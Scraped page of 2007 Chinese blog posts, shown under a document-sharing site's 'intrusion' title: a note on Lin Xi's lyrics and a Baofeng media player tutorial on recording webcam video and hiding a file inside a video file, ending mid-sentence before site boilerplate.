·<缺陷美>>林夕的词 有人说林夕是诗人 通常他的歌词有诗一样的意境;诗一样的美;好的诗是需要韵酿的!!正如美酒;自古诗酒不分家 李白也是如是说----把酒斗来诗百篇!!! 2007-02-28 00:23:44 刚才传到博客上来了不能看只好再发一次 到具体网址去看http://www.yoqoo.com/v_show/id_XMjMzNzMzMg==_module_my.html 雕虫小技 见谅了!!! · 随笔~~~原创的!! 2007-02-28 00:17:55 刚做完自己的双截棍视频 视频: 双截棍 没想到暴风影音还有这么多作用----可以录制视频!!! 首先,打开暴风影音,依次点击“文件/打开设备”选项,弹出“选择捕获设备”窗口,在“视频”框中选中你的摄像头型号,在“国别”框中选中“86-中国-PAL D”选项,点击“确定”按钮即可。稍候在暴风影音的播放窗口中就可以看到摄像头拍摄的画面了。 接着,依次点击“查看/捕获”选项,弹出“捕获”操作栏。在“视频”栏中设置画面大小和播放帧数,数值越大视频质量越好。在右上方的框中可以根据摄像头允许的最大播放帧数手动设置播放帧数,注意不要超过了允许的最大播放帧数。 在“音频”栏中设置录音来源和录音质量(如果要录制麦克风中的声音,就选中“MIC”选项,如果要录制系统中的所有声音,就选中“Stereo Mixer”选项)。 然后在“输出”栏中可根据需要勾选“录像”和“录音”选框,在相应的下拉框中选择视频和音频压缩编码类型。 点击“…(浏览)”按钮,为录制的文件选择保存路径和文件名,并在下方的下拉框中将保存格式选为“AVI”。如果要单独输出录制的音频文件,勾选“单独输出音频”选框即可。最后点击“录制”按钮就开始录制视频了,完成录像时点击“停止”按钮。 提示:选择视频和音频压缩编码类型时,需要在系统中安装对应的编码器滤镜插件。否则会提示你缺少滤镜插件而无法进行录制。 接下来是暴风中还有一个隐藏的功能 DSM!!!这可是个好东西 当我们在系统中要加密或隐藏某些重要文件时,往往需要专门的工具。其实,我们只要动动手,使用暴风影音也同样可以做到。首先在界面中依次单击DSM转换器,然后在对话框的空白处单击鼠标右键,选择“添加文件”,将任意一个视频文件添加进来,接着右击“Resources”项目,选择“添加资源”,把需要隐藏的文件添加到该视频中,单击“另存为”按钮,在弹出的对话框里将保存类型设置为“所有文件”,接着把文件保存为原来视频格式,最后单击“开始”按钮。这样即可将两个文件“合二为一”。其他人打开该文件时,便只会播放原来的那视频片断,并不会打开隐藏的文件。而当我们需要提取隐藏文件时,同样打开DSM转换器,将该视频文件添加到对话框中,然后右击“Resources”项目下的文件,选择“另存为”并设置文件的保存目录即可。 还有可以将任意的两个不同格式的视频合并播放比如说;一个AVI和一个MPE
/
本文档为【入侵】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索